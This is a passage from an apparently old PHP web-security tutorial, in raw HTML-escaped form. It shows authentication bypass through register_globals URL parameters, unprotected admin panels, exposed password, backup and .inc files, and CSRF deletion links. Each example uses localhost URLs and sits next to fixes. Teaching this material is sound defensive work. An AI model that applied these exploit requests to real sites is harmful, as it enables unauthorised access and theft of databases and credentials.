:&lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt; Use htmlentities() or htmlspecialchars() functions.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Example : $name=htmlentities($_GET[&#39;name&#39;]);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Another way :&lt;/b&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;Filter all special chars used for XSS ( a lot ).&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;(The best way is the first method.&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;)&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;11) Authentication Bypass&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips :&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;i&gt;Look deep in the scripts,look in the admin directories,&lt;br /&gt;maybe are not protected,also look for undefined variables&lt;br /&gt;like “login” or “auth”.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;11.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;nbsp;I will provide a simple example of authentication bypass&lt;br /&gt;via login variable.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;br /&gt;if ($logged==true) {&lt;br /&gt;echo ‘Logged in.’; }&lt;br /&gt;else {&lt;br /&gt;print ‘Not logged in.’;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Here we need register_gloabals = on . I will talk about php.ini&lt;br /&gt;settings a bit later in this tutorial.If we set the value of $logged&lt;br /&gt;variable to 1 the if condition will be true and we are logged in.&lt;br /&gt;Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test/php?logged=1&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;And we are logged in.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;11.1 – Via login variable&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from login.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————————————————&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;i&gt;if ($login_ok)&lt;/i&gt;&lt;br /&gt; &lt;i&gt;{&lt;/i&gt;&lt;br /&gt; &lt;i&gt;$_SESSION[&#39;loggato&#39;] = true;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;echo “&amp;lt;p&amp;gt;$txt_pass_ok&amp;lt;/p&amp;gt;”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;echo”&amp;lt;div align=’center’&amp;gt;&amp;lt;a href=’index.php’&amp;gt;$txt_view_entry&amp;lt;/a&amp;gt; |&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&amp;lt;a href=’admin.php’&amp;gt;$txt_delete-$txt_edit&amp;lt;/a&amp;gt; | &amp;lt;a href=’install.php’&amp;gt;$txt_install&lt;/i&gt;&lt;br /&gt; &lt;i&gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;}&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;————————————————————————————&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Lets see.If the “login_ok” variable is TRUE ( 1 ) the script set us a SESSION who&lt;br /&gt;tell to the script that we are logged in.So lets set the “login_ok” variable to TRUE.&lt;br /&gt;Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/login.php?login_ok=1&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Now we are logged in.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;11.2 – Unprotected Admin CP&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;You couln’t belive this but some PHP scrips don’t protect the admin&lt;br /&gt;control panel : no login,no .htaccess,nothing.So we simply we go to&lt;br /&gt;the admin panel directory and we take the control of the website.&lt;br /&gt;Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/admin/files.php&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We accessed the admin panel with a simple request.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;11.3 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Login variable bypass :&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt; Use a REAL authentication system,don’t check the&lt;br /&gt;login like that,use SESSION verification.Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;if($_SESSION[&#39;logged&#39;]==1) {&lt;br /&gt;echo ‘Logged in’; }&lt;br /&gt;else { echo ‘Not logged in’;&lt;br /&gt;}&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- Unprotected Admin CP : Use an authentication system or use .htaccess to&lt;br /&gt;allow access from specific IP’s or .htpasswd to&lt;br /&gt;request an username and a password for admin CP.&lt;br /&gt;Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;.htaccess :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;order deny, allow&lt;br /&gt;deny from all&lt;br /&gt;allow from 127.0.0.1&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;.htpasswd :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;AuthUserFile /the/path/.htpasswd&lt;br /&gt;AuthType Basic&lt;br /&gt;AuthName “Admin CP”&lt;br /&gt;Require valid-user&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;and /the/path/.htpasswd&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;sirgod:$apr1$wSt1u…$6yvagxWk.Ai2bD6s6O9iQ.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;12) Insecure Permissions&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Tips :&lt;/b&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;Look deep into the files,look if the script request to be&lt;br /&gt;logged in to do something,maybe the script don’t request.&lt;br /&gt;Watch out for insecure permissions,maybe you can do admin&lt;br /&gt;things without login.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;12.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We are thinking at a script who let the admin to have a lookup in&lt;br /&gt;the users database through a file placed in /admin directory.That&lt;br /&gt;file is named…hmmm : db_lookup.php.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from admin/db_lookup.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&amp;lt;?php&lt;br /&gt;// Lookup in the database&lt;br /&gt;readfile(‘protected/usersdb.txt’);&lt;br /&gt;?&amp;gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Lets think.We cannot access the “protected” directory because&lt;br /&gt;is .htaccess’ed.But look at this file,no logged-in check,nothing.&lt;br /&gt;So if we acces :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/admin/db_lookup.php&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We can see the database.Remember,this is only an example created by&lt;br /&gt;me,not a real one,you can find this kind of vulnerabilities in scripts.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;12.1 – Read the users/passwords&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Oh yeah,some coders are so stupid.They save the usernames and passwords&lt;br /&gt;in text files,UNPROTECTED.A simple example from a script :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/userpwd.txt&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;And we read the file,the usernames and passwords are there.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.2 – Download Backups&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Some scripts have database backup functions,some are safe,some are not safe.&lt;br /&gt;I will show you a real script example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from /adminpanel/phpmydump.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {&lt;br /&gt;$con=@mysql_connect(“localhost”,$uid, $pwd) or die(“Could not connect”);&lt;br /&gt;$db=@mysql_select_db($dbname,$con) or die(“Could not select db”);&lt;br /&gt;………………………… etc ……………………..&lt;br /&gt;mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;After a lof of code the function is called.I don’t pasted the entire code&lt;br /&gt;because is huge.I analyzed the script,no login required,no check,nothing.So&lt;br /&gt;if we access the file directly the download of the backup will start.Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/adminpanel/phpmydump.php&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Now we have the database backup saved in our computer.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;12.3 – INC files&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Some scripts saves important data in INC files.Usually in INC files is PHP&lt;br /&gt;code containing database configuration.The INC files can be viewed in&lt;br /&gt;browser even they contain PHP code.So a simple request will be enough to&lt;br /&gt;access and read the file.Example :&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;http://127.0.0.1/inc/mysql.inc&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;Now we have the database connection details.Look deep in scripts,is more&lt;br /&gt;scripts who saves important data into INC files.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;12.4 – How to fix&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Basic example :&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;i&gt;Check if the admin is logged in,if not,redirect.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- Read the users/passwords : Save the records in a MySQL database&lt;br /&gt;or in a protected file/directory.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- Download Backups : Check if the admin is logged in,if not,redirect.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;- INC files : Save the configuration in proper files,like .php or&lt;br /&gt;protect the directory with an .htaccess file.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;13) Cross Site Request Forgery&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Tips : &lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;Through CSRF you can change the admin password,is not&lt;br /&gt;so inofensive.&lt;br /&gt;Can be used with XSS,redirected from XSS.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;13.0 – Basic example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from test.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&amp;lt;?php&lt;br /&gt;check_auth();&lt;br /&gt;if(isset($_GET[&#39;news&#39;]))&lt;br /&gt;{ unlink(‘files/news’.$news.’.txt’); }&lt;br /&gt;else {&lt;br /&gt;die(‘File not deleted’); }&lt;br /&gt;?&amp;gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;—————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;In this example you will see what is CSRF and how it works.In the “files”&lt;br /&gt;directory are saved the news written by the author.The news are saved like&lt;br /&gt;“news1.txt”,”news2.txt” etc. So the admin can delete the news.The news that&lt;br /&gt;he want to delete will be specified in “news” variable.If he want to delete&lt;br /&gt;the news1.txt the value of “news” will be “1″.We cannot execute this without&lt;br /&gt;admin permissions,look,the script check if we are logged in.&lt;br /&gt;I will show you an example.If we request :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/test.php?news=1&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;The /news/news1.txt file will be deleted.The script directly delete the file&lt;br /&gt;without any notice.So we can use this to delete a file.All we need is to trick&lt;br /&gt;the admin to click our evil link and the file specified by us in the “news”&lt;br /&gt;variable will be deleted.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;13.1 – Simple example&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;In a way the codes below are included in the index.php file ,I&lt;br /&gt;will not paste all the includes,there are a lot.&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from includes/pages/admin.php&lt;/b&gt;&lt;/span&gt;——————————————————————–&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;i&gt;if ($_GET[&#39;act&#39;] == ”) {&lt;/i&gt;&lt;br /&gt; &lt;i&gt;include “includes/pages/admin/home.php”;&lt;/i&gt;&lt;br /&gt; &lt;i&gt;} else {&lt;/i&gt;&lt;br /&gt; &lt;i&gt;include “includes/pages/admin/” . $_GET[&#39;act&#39;] . “.php”;&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;——————————————————————–&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;Here we can see how the “includes/pages/admin/members.php” is included in&lt;br /&gt;this file.If “act=members” the file below will be included.&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;- Code snippet from includes/pages/admin/members.php&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————————-&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: left;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;if ($_GET[&#39;func&#39;] == ‘delete’) {&lt;br /&gt;$del_id = $_GET[&#39;id&#39;];&lt;br /&gt;$query2121 = “select ROLE from {$db_prefix}members WHERE ID=’$del_id’”;&lt;br /&gt;$result2121 = mysql_query($query2121) or die(“delete.php – Error in query: $query2121″);&lt;br /&gt;while ($results2121 = mysql_fetch_array($result2121)) {&lt;br /&gt;$their_role = $results2121[&#39;ROLE&#39;];&lt;br /&gt;}&lt;br /&gt;if ($their_role != ’1′) {&lt;br /&gt;mysql_query(“DELETE FROM {$db_prefix}members WHERE id=’$del_id’”) or die(mysql_error&lt;br /&gt;());&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;———————————————————————————————-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;We can see here that if “func=delete” will be called by URL,the script will&lt;br /&gt;delete from the database a user with the specified ID ( $id ) without any&lt;br /&gt;confirmation.Example :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;http://127.0.0.1/index.php?page=admin&amp;amp;act=members&amp;amp;func=delete&amp;amp;id=4&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: 